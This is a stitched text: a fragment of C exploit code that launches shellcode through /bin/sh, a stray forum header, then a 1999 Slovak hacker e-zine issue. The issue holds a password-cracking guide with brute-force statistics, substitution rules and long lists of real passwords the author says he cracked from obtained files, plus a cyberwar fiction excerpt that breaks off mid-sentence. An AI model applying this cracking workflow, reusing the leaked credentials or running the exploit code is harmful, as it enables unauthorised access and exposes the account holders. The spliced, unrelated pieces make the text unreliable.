if (connect(sck, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Error: Connection refused.n");
}

printf("Status: Connecting to %s.n", argv[1]);
printf("Press any key to send shellcode or ctrl-c to abort.n");

if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);while(1);
}


00000001000001020061730200619270
pajkus
 pajkus      03.03.2004 - 13:40:34 , level: 1, UP   NEW





::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #13, 09.12.99 , prielom(at)hysteria.sk, http://hysteria.sk/prielom/





obsah
 



intro

teoria a prax hladania passwordov

velka kyberneticka vojna roku 2002
[i]


process table attack

echelon, globalny monitorovaci system

generator nahodnych cisiel








intro


po dlhsom case sa vam opat hlasime z nasho studia v mlynskej doline. stale
dlhsie a dlhsie prestavky medzi nasimi relaciami sa uz zdaju byt samozrejmostou.
budeme sa s tym snazit nieco urobit.


hlavnym chodom dnesneho menu je zaujimavy clanocek o crackovani passwordov,
podlozeny vycerpavajucimi statistikami. mame tu pre vas prvu cast zo slubeneho
uryvku z knizky velka kyberneticka vojna roku 2002. kratky popis denial of
service utoku na tabulku procesov. big brother is still watching us, echelon,
globalna monitorovacia siet krajin skupiny UKUSA. a na zaver mensia mystifikacia
o tajomstvach ludskeho mozgu.


salo, 09.12.99 zilina




teoria a prax hladania passwordov



pouzitie autorizacie si vyzaduje autorizacny kluc. pokial kluc nema byt viazany
na hmotny nosic alebo biometricky system, vznika subjektivny problem
zapamatatelnosti. kazdy sa samozrejme stretol s generovanymi heslami, ktore si
musel zapisat alebo sa ich nadrislit. pokial vsak subjekt ma moznost volby,
postupuje celkom inym sposobom.


brute force (BF) kontra wordlist pri DES, MD5, SS, LM, ZIP, RAR, ARJ, AIN a mnohych inych...


ak vezmeme do uvahy pocet znakov, ktore nam bezne poskytuje pocitac (96 variant)
potom pri 8 znakoch (co je priemerna dlzka slova), moze vzniknut 7 213 895 700 000 000
kombinacii. na ich prekombinovanie BF v uspokojivom case by nestacil ani
najrychlejsi stroj. preto ma to viedlo k zamysleniu sa nad problematikou a
niekolkym experimentom.


ako sme uz pisali, zakladnym predpokladom je zapamatatelnost hesla. heslo je
zrkadlom stavu jedinca v danom okamihu. co na to statistika? ludia, pokial nie
je obmedzeny generatorom, si volia autorizacny kluc priblizne podla naslednej
statistiky.




dalsou uzitocnostou, ktoru je mozne vyuzit, je frekvencny vyskyt znakov v danom
jazyku. ak podla neho zoradimne wordlist alebo nastavime BF, zvysujeme
pravdepodobnost a skracujeme cas vyhladavnaia.


percentualny vyskyt znakov


kombinacia znakov percento priklad
vsetky male 63.4 % kether, rnavat, iloveusa
vsetky velke 0.6 % DOMINO, FULCRUM, MOZART
vsetky cisla 7.8 % 180372, 01158220, 3.141592
vsetky specialne 0.0 %
prve velke, ostatne male 9.3% Alecra, Banesto, London
prve male, ostatne velke 0.1 % pETER, kOSICE
prve cislo, ostatne male 1.0 % 1penis, 1stein, 3tristar
prve cislo, ostatne velke 0.0 %
prvy specialny, ostatne male 0.0 %
prvy specialny, ostatne velke 0.0 %
prvy specialny, ostatne cisla 0.0 %
ine 17.8 % %erF&el, indigo2, 123!@#, /.,mnb, AnDrea


dalsou uzitocnostou, ktoru je mozne vyuzit, je frekvencny vyskyt znakov v danom jazyku. ak podla neho zoradimne wordlist alebo nastavime BF, zvysujeme pravdepodobnost a skracujeme cas vyhladavnaia.



percentualny vyskyt znakov




znak zname hesla slova/jazyk
a 9.68% 7.60%
e 5.15% 9.50%
i 5.10% 6.66%
r 4.73% 5.42%
o 4.64% 5.26%
n 3.91% 5.87%
s 3.65% 5.44%
t 3.43% 5.16%
l 3.25% 3.81%
k 3.09% 2.14%
1 2.62% 0.06%
m 2.36% 2.51%
c 2.28% 2.61%
d 2.02% 2.43%
u 1.91% 3.29%
p 1.62% 2.05%
b 1.55% 1.43%
h 1.30% 1.99%
v 1.25% 1.46%
g 1.15% 1.84%
2 1.14% 0.02%
3 0.89% 0.01%
7 0.88% 0.01%
f 0.80% 0.96%
y 0.79% 1.10%
0 0.78% 0.01%
6 0.67% 0.01%
z 0.67% 0.88%
5 0.63% 0.01%
9 0.63% 0.01%
j 0.60% 0.71%
4 0.57% 0.01%
8 0.37% 0.01%
M 0.30% no test
w 0.25% 0.68%
x 0.17% 0.20%
S 0.15% no test
L 0.14% no test
A 0.13% no test
B 0.11% no test
D 0.11% no test
O 0.11% no test
C 0.09% no test
I 0.09% no test
P 0.09% no test
T 0.08% no test
G 0.07% no test
K 0.07% no test
R 0.07% no test
Z 0.07% no test
E 0.06% no test
V 0.06% no test
. 0.05% 0.01%
@ 0.05% no test
F 0.05% no test
U 0.05% no test
q 0.05% 0.24%
N 0.04% no test
0.02% 0.11%
! 0.02% 0.00%
& 0.02% 0.03%
H 0.02% no test
* 0.01% 0.00%
, 0.01% 0.25%
- 0.01% 0.31%
/ 0.01% 0.06%
= 0.01% 0.00%
J 0.01% no test
` 0.00% 0.07%
_ 0.00% 0.02%
˙ 0.00% 0.02%
| 0.00% 0.02%
" 0.00% 0.01%
^ 0.00% 0.01%
{ 0.00% 0.01%
0.00% 0.01%
? 0.00% 0.01%
} 0.00% 0.01%


povsimnite si nesulad medzi vyskytom v jazykoch (wordfile) a v znamych heslach.


teorie bolo dost. a co prax? z grafov sa nenajeme...

takze tabulka ucinnosti metod z mojej praxe.




metoda
pociatocny stav
pocet soli
najdene
percento
cas


single

2894

1258

214

7.39%

15 minut


vsetky 1 znakove

2641

1200

0

0.00%

1 minuta


vsetky 2 znakove

2641

1200

2

0.08%

3 minuty


vsetky 3 znakove

2639

1198

1

0.04%

0.5 hodiny


datumy a cisla

2638

1197

190

7.20%

5 hodin


slovnik

2448

1194

216

8.82%

30 dni


celkovo

2894

1258

623

21.53%




z toho vyplyva aj nasledovny postup. je navrhovany na rychle rozbitie bezneho
passwordu (do 7 dni-periodicke zmeny) pri dostatocnom procesorovom case.
zachytene, zotriedene udaje analyzujem podla krokov.


prvy komputer - brute force





sposob
odhad ukoncenia
pocet pokusov


single




1 miestne
3 sekundy
95


2 miestne
4 minuty
9.025


3 miestne
1 hodina
857.375


4 miestne
20 dni
81.450.625


5 az 8 ciferne cisla
5 dni







druhy komputer - slovnik (1200 pravidiel, velkost 48 MB)





zakladne pravidla
odhad ukoncenia - 48 hodin





sposob
priklad


bez pravidiel, vsetky male
abcdefgh


prve velke, ostatne male
Abcdefgh


posledne velke, ostatne male
abcdefgH


vsetky velke
ABCDEFGH


odzadu
hgfedcba


odzadu, posledne velke
hgfedcbA


odzadu, prve velke
Hgfedcba


potom nasleduje pridavanie pred, za a zameny...



treti komputer - brute force, 4 az 8 miestne, vsetky male


stvrty komputer - brute force, 4 az 8 miestne, vsetky


takze to spustim a idem na kafe. samzrejme, nie je to take jednoduche. a co ak
heslo nenajdem a neviem o jedincovi skoro nic? (pouziva pocitac, tvari sa ze
tomu rozumie, ma pravdepodobne babu a podobne somariny). slovniky zaryto mlcia
a ja si pisem substitucne pravidla.



Substitucne pravidla




Str

Zamienanie

Str

Komentar


1

->

!

Shift 1


2

->

@

Shift 2


3

->

#

Shift 3


4

->

$

Shift 4


5

->

%

Shift 5


6

->

^

Shift 6


7

->

&

Shift 7


8

->

*

Shift 8


9

->

(

Shift 9


0

->

)

Shift 0


tu

->

2

English eqv.


for

->

4

English eqv.


per

->

%

Slovak eqv.


pet

->

%

Ani srnka netusi


an

->

&

English eqv.


and

->

&

English eqv.


5

->

pet

Slovak eqv.


1



ein

English eqv.


1



ain

English eqv.


3



tri

Slovak eqv.


l



1

Podobnost


s



$

Podobnost


S



$

Podobnost


p

->

%

1. pismeno


l

->

!

Podobnost


o



0

Podobnost


O



0

Podobnost


100



sto

Slovak eqv.


2

->

du

Nejaky eqv.



ak si myslite, ze tu pisem blbosti, skuste si stiahnut nejaky passwd alebo
kryptovany subor a najst pass... zatial je moja ucinost viac ako 50%..

a co vasa ?


na zaver vam zelam uspesny lov a uvadzam zopar prikladov hesiel ktore som
crackol:


cisla a datumy


01158220, 020177, 031259, 050877, 102036, 102349, 14313995, 14512212, 150177,
151215, 160177, 170975, 18.5.198, 18031912, 18636943, 191993, 196713, 19681968,
200677, 20111971, 210911, 211044, 21121969, 220530, 2221333, 222684, 231058,
234567, 250747, 291052, 3.141592, 31051978, 310576, 310770, 31101976, 3141514,
315341, 318126, 318197, 321233, 322539, 362751, 39103957, 414461, 419576, 444759,
481954, 506015, 512512, 514115, 563256, 566386, 611960, 654321, 673196, 678212,
69061375, 700802, 703586, 7137121, 714516, 731102, 740312, 74050751, 74062182,
74100671, 741220, 766030, 766117, 77011683, 770118, 77581677, 780313, 788020,
800811, 814898, 81961595, 934076, 946284, 956140


nieco pred ...


1honolul, 1ivana, 1patty, 1penis, 1washbur, 2country, 2korytna, 3popolni,
3tristar, 5kotab, 5monca, 9felicia, 9kamal, 9silvia, 8friday, 7sedem, 123kid,
123mir


... a nieco za


Andy20, Avignon1, Cubase3, Danka1, Ebdon8, Fatty1, Hack1, Iness7, Inferno6,
Lubica1, Masters!, Masters1, Medved1, Michael, Minko20, Nemecko1, Otvorit1,
Resolut8, Seattle1, Slavo8, Trebor1, Vierka1, Voyager!, adino1, advance0,
akire7, alena1, amerika2, andover7, andy20, andy21, aniko1, anna1, archie4,
aruhsu1, asad31, atmel1, audia3, avokceh1, avoslap1, banany1, bandler7,
beata22, beatle., beavis3, birne4, bologna9, brezno1, brucele1, canaria1,
char10, chesed7, dagmar1, dallas1, diane13, divadlo8, dolly1, drago3, drakula1,
dusan1, fighter2, florum1, ga1996, galat3, genet0, germen8, harley1, helena&,
honda0, iastate., inalfa99, ivan12, ivelat, iveta1, jana20, john77, jony11,
josko1, jozefb, kata96, kinga1, kisf96, klokan1, kobyla2, kozar1, lacika2,
laob75, lattice1, lenka1, levo11, live97, lubica3, lucia1, lucia12, macko22,
maco28, magor1, mama11, marek20, maria1, mario1, martin33, martin7, martin@,
mathiol, matko1, matko3, mb223c, mb6042, mechani1, megalop2, melon1, mercur7,
mike14, milan11, milano7, milis12, miriama1, mukell, nirvana7, okolo., pas210,
patty12, paul35, pe1973, pel111, peter11, philips1, pneus3, pol123, polpol,
popik0, potopa2, radko12, radovan1, rebe23, robert1, rodina3, romania1,
safari1, sakkara2, saraz23, sarik1, science1, stomata1, strom1, stud01, sumec1,
sun123, superc64, talento3, tiborko1, trieda1, univers1, unloved2, vat20,
vrana1, xenia1, zuzana1, zuzina6, kiss11, tompet21, bea13


preco nie aj pred aj za?


2martin@, @kabat@


hry s klavesnicou a abecedou


123456, 123abc, 1q2w3e, 1qw23e, /., mnb, 123b4a, a1b1c1, a1b2c3, a3b2c1,
abc123, m1m2m3, qwerty, qwertyu


mena a slova (prve velke alebo male)


Alecra, Alferi, Anax, Andrea, Arcino, Bacher, Banesto, Basket, Borovan, Branko,
Budapest, Butler, Canberra, Chrobaky, Corado, Cracres, Dagmar, Daniela, Dodika,
Dolores, Dulius, Dvojca, Encore, Erika, Erikap, Farnesin, Fedor, Ferino, Gabika,
Ganymed, Giacomo, Goodtime, Heureka, Hovado, Ildiko, Ingrid, Inovecka, Ivanaa,
Jazzmusi, Kacena, Karate, Kocian, London, Lubica, Lubomira, Lunica, Lydmar,
Magician, Majuska, Maniac, Mariap, Marosko, Martin, Martina, Martinko, Matejko,
jozefgar, xxxxxx

uz by aj stacilo...


zaklady substutucie


3logia, 1stein


substitucie, stredna skola


Boro2r, Ivo01, arp1ka, black$, peter1@


tvarime sa rafinovane


15StraNa, AnDrea, BrAnKo, DOMINO, FULCRUM, , GEnius, GandalF, LACO59, MLibiak,
MOZART, ROMANKO, SEPULTUR, SIMLUJ, SiSa97, ZAKOVIC, accus712, bak754, banska s,
bar123, baraCuda, c16sys, bure96, d1u2s3, di12392, ko1911, front242, hs2751,
lk1964, maria-an, mata1992, ncc1701, pico1310, pk3112, pl2351, sps2li, ssss14,
st1941, az1522, gb9999, ks1111, AREXAM, 333sl, ROMPPS1, abcd012


rafinovanost skryta v nenapadnosti



dlmmp&95 - prve inicialy mien a rok
%erF&el - Peter Fandel
m2mk7t - skutocne neviem, co by to mohlo byt :(


k napisaniu prispeli: moja manzelka - soc.inzinierstvo, PLC - sprava
a ochrana systemov, Last Caller - komunikacny expert (elektronicke kluce)
...a vsetci ktori mi zabezpecili pristup ku kryptovanym udajom


dakujem: rychlym 2 a 4 CPU serverom za rychlu desifraciu, spravcom za
slabu ochranu systemov a bohu za to, ze tu mozem o tom vsetkom spekulovat.


p.s. najvacsie tajomstvo na svete je, ze neexistuje ziadne tajomstvo.
a nezabudnite heslo je *******, :)


O.M.D.G.


pouzite zdroje: psychologia a ine aspekty passwordov V.1.0 a V.2.0,
LED 2.x


navrat na obsah



velka kyberneticka vojna roku 2002
[i]



v tomto pribehu, bude liddy doleova celit najvacsej krize jej obdobia v
urade prezidenta: prvej globalnej kybernetickej vojne, kde nepriatel je
neviditelny, bitky virtualne ale straty na zivotoch az prilis
realne.



10. jul 2002, 12:04 pdt



tentokrat je to naozaj. velka kyberneticka vojna sa zacala. som si tym
isty. rozhodol som sa zaznamenat vsetko, co sa udeje, pretoze som
presvedceny, ze jeden z mnohych scenarov, ktore som v poslednom obdobi
analyzoval, sa zacina uskutocnovat. pred dvoma dnami bola jedna sprava
anonymne a s velkou sikovnostou zverejnena na niekolkych komercnych
web-strankach.




.--------------------------------------------------------------------------.
| _____ _____ __ __ |
| | _ | | ___| | | | | |
| | ___| | ___| | |/| | |
| |__| |__| __/__/ |
| |
| LUDIA ZA SLOBODNY SVET |
| (PEOPLE FOR A FREE WORLD) |
| |
| S L O B O D A |
| |
| davame tymto na znamost, ze my, ludia za slobodny svet, uz nebudeme |
| dlhsie tolerovat nastolenie americkej hegemonie. odo dneska budeme |
| bojovat proti vojenskemu, ekonomickemu a kulturnemu imperializmu |
| spojenych statov americkych vsetkymi moznymi sposobmi a prostriedkami. |
| |
| kedze americke ozbrojene sily okupuju mnoho krajin a kontroluju |
| komunikacne a dopravne tepny na celom svete, podujimame sa na |
| oslobodenie tych, ktori su okupovani, a znovu obnovime slobodu |
| medzinarodneho hnutia. |
| |
| preto teraz davame spojenym statom sest dni, aby zavreli svoje |
| vojenske zakladne mimo uzemia spojenych statov, inak narusime hlavne |
| clanky americkej infrastruktury. disponujeme silou a inteligenciou na |
| splnenie nasich hrozieb. pre bezpecnost vasich deti a pre slobodu |
| vsetkych ludi, neignorujte tuto vyzvu. |
| |
| L U D I A Z A S L O B O D N Y S V E T |
| |
| -----BEGIN PGP SIGNATURE----- |
| IQA/AwUBNHMJOBuDJQtcRR9AEQJn+QCfX |
| 8ORuFXpbFd9RmOjsdgT3Yrl Cn4AolIA |
| RoGC+I2hYdh7rE/DDp6FX3GC=IMsD |
| -----END PGP SIGNATURE----- |
| |
`--------------------------------------------------------------------------'



toto vyhlasenie sa objavilo na uvodnej stranke cnn o 8:30 v pondelok
rano. veduci webmaster cnn o hodinu neskor vyhlasil, ze to nebola
oficialna sprava cnn a podla ich zaznamov ani nikto z vnutra spolocnosti
ju nemohol zverejnit. v priebehu niekolkych sekund od zverejnenia na
strankach cnn sa sprava objavila aj na dalsich strankach s vysokou
navstevnostou, ako su usa today, the guardian, espn sportszone,
disney.com, a africa online.


vyzera to na velky hackersky zatah, a aj nim je. ale od chvile, ako som
cital to vyhlasenie a videl niekolko titulkov, ktore sa z neho zverejnili,
citil som, ze to nie je len zart.


cely pondelok sa computer-security specialisti snazia zrekonstruovat
priebeh hacku. nikto ho neberie vazne. stary mazaci on-line bezpecnosti
sa zamerali na technicke aspekty, rozsiahlost a simultannost utoku.
webmasteri boli zahanbeni a priznali, ze nemaju ponatia, ako niekto
zvladol takyto siroky zatah. ako je mozne umiestnit spravu na uvodnu
stranku a nezanechat po tom ani stopu? dostalo sa to dokonca do vecernych
sprav a bola o tom zmienka v rannych novinach.


ale v utorok sa to uz vyparilo z tv sprav. zacal som hladat vsetky logy a
data ktore sa dali ziskat - zvacsa vcera zverejnene na docasnych
strankach www.peoplefree.net, vcera spojazdnenych - a cim viac som ich
cital, tym viac som zacinal byt ustarosteny. trapim sa nad neurcitymi a
neuplnymi povodmi titulkov a aj obsahu deklaracie.


neskor rano prezidentka vydala tlacove vyhlasenie, ktore som si precital
na msnbc. a to ma uplne dorazilo. povedala, ze sprava "ulozena" na cnn a
dalsich spravodajskych web strankach je zrejme nafuknuta bublina a je
typickym hackerskym zartom a nie je sa cim trapit, bla, bla, bla. vsetko
je pod kontrolou. tiez povedala, ze "nasa krajina ma najlepsiu
monitorovaciu infraskturu a je pripravena chranit kriticke systemy celej
krajiny tak, ze budu vzdy v bezpecnom stave."



toto ma trapi najviac, pretoze viem, co to znamena - aktivuju tu staru
haraburdu z clintonovej ery, minimalnu nevyhnutnu informacnu
infrastrukturu (mnii). ha! to je kydanie konskej sracky. to nemoze
ubranit ani zavareny kontajner. vravel som im to snad stovky krat, zrejme
preto ma prepustili.


vcera sa mi podarilo zohnat dvoch z mojich najlepsich studentov namornej
postgradualnej skoly odtialto z monterey, aby mi pomohli spracovat
cokolvek, co mozeme zistit o tomto pripade. rozhodli sme sa oznacit sa za
team odpudzovacov crackov. ivar a connie si myslia, ze to je velmi
poucne. ja sa vsak domnievam, ze si mozeme este narobit vela
neprijemnosti.


ale nemame ziadne pravomoci. nepomoze, ked telefonujete z namornej
postgradualnej skoly a pytate sa niekoho na citlive informacie.
"namorna... coo?" pytaju sa, "volate z nejakej lode?"



connie bola uzasna. nakopla si svoje cd s living death a za 24 hodin
zhromazdila riadnu horu dat. ivars kontaktoval majitelov haknutych
stranok, aby zhromazdil log subory a vsetok zvysny sajrajt, co z nich
mohol vydolovat. objavil tiez niekolko news skupin, kde bola deklaracia
taktiez zverejnena, a o ktorych sa doteraz nevedelo. ako sme ocakavali
"ludia" pouzili niekolko anonymnych remailerov na zotretie stop na
usenete, ale ivars poznamenal, ze sekvencia remailerov bola nezvycajna.


11. jul, 10:07 pdt



toto rano ziskala connie podvodom troska vypoctoveho casu na skolskom
crayi. peterson mi nainstaloval poslednu verziu jazykoveho analyzatora.
dlzim mu basu budweiserov. ivars prisiel rano po prebdenej noci a vravi,
ze analyza smeruje k dvom zdrojom, nie jednemu, ale ani k tuctu. ani
jedna zo sledovanych stranok sa o tomto nezmienila.


spravodajske agentury venuju vyhlaseniu pfw menej casu ako pojebanemu
pocasiu. vlna tepleho pocasia na zapade - to su teda spravy.


ivars poznamenal, ze termin urceny ludmi je den dobytia bastilly. myslim,
ze to znie zlovestne.


rano som stravil vycerpavajucim telefonovanim s mojimi starymi znamymi
(teda aspon s tymi, co sa so mnou este rozpravaju), z foggy bottom a zo
spolocnosti. skutocne to vyzera tak, ze nemaju o nicom potuchy. potom mi
vsak m. poslal obeznik so suhrnom informacii o pozadi veci. a podla mna
sa to da dokopy poskladat a vychadza z toho riadny pruser.


aktualne ohniska nestability



1. na zaklade poziadaviek spojenych statov bude dalsie kolo rozsirovania
nato v maji zahrnovat litvu, slovensko a rumunsko. napriek ostrym
lebedovym protestom vedenie aliancie jednomyselne rozhodlo o zaradeni
tychto krajin do obranneho zdruzenia do konca roku.


2. taiwan vydal formalne vyhlasenie nezavislosti. cina ohlasila ze sa
zmocni kontroly nad ostrovmi "vsetkymi dostupnymi prostriedkami". spojene
staty neposkytli ziadne priame garancie bezpecnosti ale varovali cinu,
ze by mala pokracovat "len mierovym sposobom riesenia konfliktu".


3. niekolko dni neskor rusko a cina vstupili do kooperacie v zaujme
zvysenia svojej bezpecnosti. cina investuje do rozvoja priemyslu v rusku,
vymenou za vojensky material. (toto pentagon radostne privital, pretoze
to moze viest k dalsim zavodom v zbrojeni a vyviest z rovnovahy ruskych
komunistov, ktori prave prezivaju velky navrat).


4. severna korea opat pokracuje v atomovom programe, porusila tak
carterovu dohodu o odzbrojeni z roku 1994. spojene staty okamzite
zastavili dodavky obilia, uvalili tazke ekonomicke sankcie na pchjong-jang
a
poslali dalsiu skupinu lietadlovych lodi do japonskeho mora.


5. iran a irak rozsirili provizornu mierovu zmluvu z roku 1990 a vstupili
do plne obranneho spolocneho paktu. (reakcia pentagonu bola rovnaka ako v
bode 3, len od inych specialistov na globalne divadielko).


rychlo si musime zohnat nejaky elektricky generator.


12. jul, 08:11 pdt



neskoro v noci, predtym nez som si siel lahnut, som cital prve spravy na
inete spominajuce moznost vojny. ale boli zverejnene na alt.conspiracy.


rano som skocil do zeleziarstva, schmatol som honda generator a tucet
bandasiek. ivars ich prave naplna benzinom. taktiez mame baterky, nejake
nadoby na vodu a zvycajne nudzove zasoby potravin z tesca. mam nielen
maly radio prijimac ale aj ham radio a spektralny skener na slnecnu
energiu. nasa izba vyzera ako kasarne nejakych bivakujucich typkov. citim
sa fakt ako maniak.


pokusil som sa dostat vreelanda k telefonu. jeho sekretarka ma schladila
tonom typu "general vreeland ma pred vami varoval." nakoniec som hovoril
s plukovnikom pritchettom. povedal mi "ano, situacia je povazliva, ale ak
budeme reagovat prehnane... "
prehnane! znova som mu povedal o ohrozeni
radarovych systemov, ohrozeni rozvodu elektrickej energie ale cim viac
som ho presviedcal, tym viac som posobil paranoidnym dojmom, nielen v
jeho ale aj mojich vlastnych ociach.


to co vidim, je rozvoj "fragmentovej vojny", vedenej rozptylenym a vysoko
technicky rozvinutym sietovym nepriatelom, ktory smelo busi do srdca
nasej informacne zavislej spolocnosti. napisali sme o tomto celu knihu
pre rand, koncom 90 rokov.


connie lame remailerove skoky na skolskom crayi, zatial ivars rozchodil
jazykovy analyzator pracujuci na analyze sprav uverejnenych za poslednych
sest rokov na webe. je to myslitel so sirokym zaberom, takze dufam, ze na
nieco pride.


12. jul, 18:00 pdt



ivars mal nejake vysledky: anglictina nebola rodnym jazykom toho cloveka!
connie tiez prisla s nejakymi predbeznymi napadmi. domnieva sa, ze dva
zdroje alebo aspon jeden z nich je v azii. ivars si tiez mysli, ze
najmenej jeden utok bol urobeny cez mikrovlnne programovanie! povazovane
za nemozne - a teraz, po vytrvalych pokusoch, sa to niekomu mozno
podarilo. data modifikovane pocas prenosu vzduchom...


mckayovi som dnes odpalil nasledujuci list:


to: admiral william mckay, riaditel oddelenia informacnych zbrani,
pentagon

from: jack miller, namorna postgradualna skola


mily bill, to "vyhlasenie" by sa malo brat velmi vazne.
dovody:

1.jazykova analyza textu spravy ukazuje, ze bola napisana clovekom,
ktoreho
rodny jazyk nie je anglictina, pravdepodobne je to korejcan
2. odkazy
zaslane do usenetu a systemove zaznamy napadnutych sieti
ukazuju, ze
udaje pochadzaju odkialsi z azie.


system minimalne nevyhnutnej
informacnej infrastruktury ( mnii ) nie je
odpovedou tejto hrozbe. mnii
je zamerany na zaistenie bezpecnosti
prezidentskych rozkazov a riadiacich
funkcii tykajucich sa ozbrojenych sil usa. system bol navrhnuty tak, aby
umoznoval zakladnu vojensku a najnutnejsiu civilnu obranu, udrzanie
funkcnych komunikacii po digitalnom utoku. tato situacia si vsak ziada
nepretrzite monitorovanie vojenskych a civilnych infrastruktur clovekom:
financnictvo, doprava, energetika. zoberuc do uvahy mozne mikrovlnne
programovanie, mame dalsiu dimenziu ktoru musime strazit. ak ma
potrebujes, vecer by som mohol byt vo vojenskej miestnosti. - jack


treba kupit prenosny tv a prenosnu antenu. connie vravi ze uz mi z toho
harasi.


ale do dna d zostava uz len 48 hodin. den detonacie. najdolezitejsou
ulohou dnesneho vecera je odtienenie vsetkeho nasho elektronickeho
vybavenia. poslal som syna, aby zohnal medene pletivo, ale zohnal len
bezne zinkove. nasiel som na smetisku olovenny kryt na tienenie, do tohto
strcim svoj pocitac. viem, je to pravdepodobne blaznive. nabuduce budem
mat olovene tienenie i v klobuku. mozno som ... nie, to radsej nepoviem.


objavila sa len velmi skromna zmienka o bliziacom sa hranicnom termine -
i to s uskrnom - na sieti usa today.


13. jul, 10:10 pdt



moje upozornenie mckayovi bolo odmietnute. z politickeho hladiska si
mckay nemoze dovolit brat ma vazne, pretoze sa uz "angazoval", ked mi
dohodil miesto v postgradualnej skole po tom, co ma vyhodili z pentagonu.


okolo celej miestnosti sme urobili zeleznu klietku. a nasli sme i sposob
ako vyuzit tienene generatory. ivars popoludni testoval nastavenia.


pomocou "pozicaneho" sniffovacieho softveru sme urobili dalsie analyzy
premavky. porovnali sme vsetky postingy na web z 8.jula, kedy bolo
zaslane to vyhlasenie a kedy boli zaslane jeho kopie na ostatne sajty.
napad spociva v tom, ze nie je mozne poslat naraz viac ako jednu vec.
pretoze tu bol ten datum dobytia bastilly, pozreli sme sa na zname
francuzske teroristicke skupiny. vyradovanie este neprinieslo ocakavane
vysledky pretoze vypocty trvaju cele hodiny, aj na crayi.


vratil som sa spat k nasej rand studii o informacnej vojne. aj
odmietnutie doleovej vlady zodpoveda scenaru!


zajtra je ten deadline. jedine, co mozem teraz robit je cakat, kym
neudru. vazne, sakra, bolo by to ok, keby som sa tentokrat mylil.


14. jul, 09:44 pdt



vypadok prudu! hej, pricinou by mohlo byt i cosi ine. o 9:20 som pozeral
cnn, msnbc a fox news, ked sa moje tri televizory na striedavy prud zrazu
vypli. directv programming na mojom bateriami napajanom stroji na par
minut zmrzol, kym sa nenakopli generatory televiznej stanice. (nase sme
nahodili vzapati) spravy hlasali, ze vypadok sa rozsiril smerom k los
angeles.


telefonne linky su tiez mrtve. mckay, ak i chcel, nemohol sa so mnou
spojit. (hah: teraz by chcel.)


dvadsat minut bez prudu a v kancelarii zacina byt neprijemne teplo. to je
ta vlna horucav spolu s tymi vsetkymi zariadeniami a generatormi, bez
vzduchoveho chladenia - na tento problem som nepomyslel.


14. jul, 13:54 pdt



posledne tv spravy priniesli spravu, ze tri 500-kilovoltove prenosove
vedenia vychadzajuce z vodnych elektrarni pozdlz zapadneho pobrezia, boli
vyradene z cinnosti. to sposobilo prerusenie dodavky elektrickej energie
a telefonnych sluzieb v celej kalifornii a oregone. vykonny riaditel
koordinacnej rady western systems oznamil, ze problem sa kaskadovite
siril cez rozvodnu siet, vyradiac z cinnosti elektrarne v rock springs,
wyoming, v pekelnom kanone, idaho a v brush, kolorade. vypadok sa tyka
niekolkych zapadnych statov usa.


spravy okolo poludnia tiez naznacili, ze neboli zistene ziadne znamky
sabotaze. to znamena ziadne fyzicke poskodenie systemu.


elektrikari pisali na odbornych www sajtoch, ze pfw odhalili niekolko
kodovanych pristupovych ciest do automatizovaneho riadenia, ktore
spravuje energeticku rozvodnu siet.. nie jeden, niekolko. niet sa co
cudovat, kody a zabezpecovacie nastavenia na firewalovych pristupoch boli
zastarale. takze: mikrovlnne programovanie nebolo nutne (to bola paranoja
- nemal som nechat ivarsa, aby mi o tom hovoril; teraz vyzeram... horsie
ako zvycajne). pouzili standardne - nadherne prepracovane - techniky.


ohlaseny vypadok spojenia je teraz jedinou temou diskusii na tv. krdle
pseudo-expertov hrkutajuc ako holuby uistuju znova a znova: to nie su
teroristi, mile deti.


generatory nam tu funguju ale telefony su stale hluche. web mi tiez
vypadol. cez priame tv vysielanie som pocul, ze podla zdrojov na webe je
toto "len zaciatok" - este pride havaria jadrovych elektrarni. podla
nasich scenarov toto by nemali byt schopni urobit, lebo nie su na
rovnakom type vstupu do rozvodnej siete. ale...moze pocin oznacovany ako
zapas za ludstvo, zavrazdit miliony tychto ludi? typy ako su tito by
obavy o nezucastnenych divakov nikdy nezastavili.


14. jul, 18:00 pdt



zap! toto hlasalo logo vecernych sprav. tato udalost bola pomenovana "big
zap". pocul som, ze niektore z "vypnutych sieti" uz nabehli a zistuju, co
sa stalo. tie casti webu, ktore este funguju, zaznamenavaju rekordnu
premavku; niektore zap sajty prijimaju miliony ziadosti za hodinu. ufo
sajty su ocividne takisto zahltene so spravami, ze to neboli teroristi,
kto umrtvil energeticku rozvodnu siet. clovek by sa na tom zasmial, keby
to nebolo smutne. unia ufo realistov - prekvapivo velka skupina volicov -
ziada o prijatie u prezidentky.


systemy bezdrotoveho emailu v dosledku sirokeho rozsahu vypadku nikdy
nepracoval. jedinou spolahlivou vecou je am radio a directv. ham radio je
pekna vec, ale vycerpavajuca.


15. jul, 06:15 pdt



elektrina a telefony nabehli minulu noc okolo polnoci.


o polhodinu neskor boli vypnute opat - ako vysmech! za polhodinu opat
nabehli, obdrzal som slusnu kopku emailov. medzi nimi bolo niekolko
upozornujucich, ze vaznost vypadku si vyzaduje uplne ciste spustenie,
ktore v niektorych pripadoch trva dlhsie ako samotny vypadok.


hlasene straty: doteraz 35 znamych umrti, od dopravnych nehod po
infarkty. mnoho obeti teplotneho soku medzi dochodcami. zap sajty
informuju, ze ekonomicke skody dosiahli hranicu miliardy dolarov. podla
neoverenej spravy sa vodna priehrada v kalifornii po vypadku prudu
pretrhla a zabila tisice ludi. ak by sme povazovali poslednu spravu za
klebetu, celkovy efekt na ludskych stratach zatial nie je katastrofalny.
mohlo by to byt ovela horsie. ovela.


niekolko ludi v nepostihnutych castiach krajiny rozsirilo odkaz od ludi,
co sa objavil na webe: "mozno nasledujuce prezidentkino vyhlasenie uz
nebude take arogantne a ubezpecujuce".
toto tiez malo rovnaky kryptovany
podpis.


prezidentka vydala opat vyhlasenie. ochranne opatrenia, ktore vyhlasila
pred tromi dnami - meii - je zamerane, ako povedala, na zabezpecenie
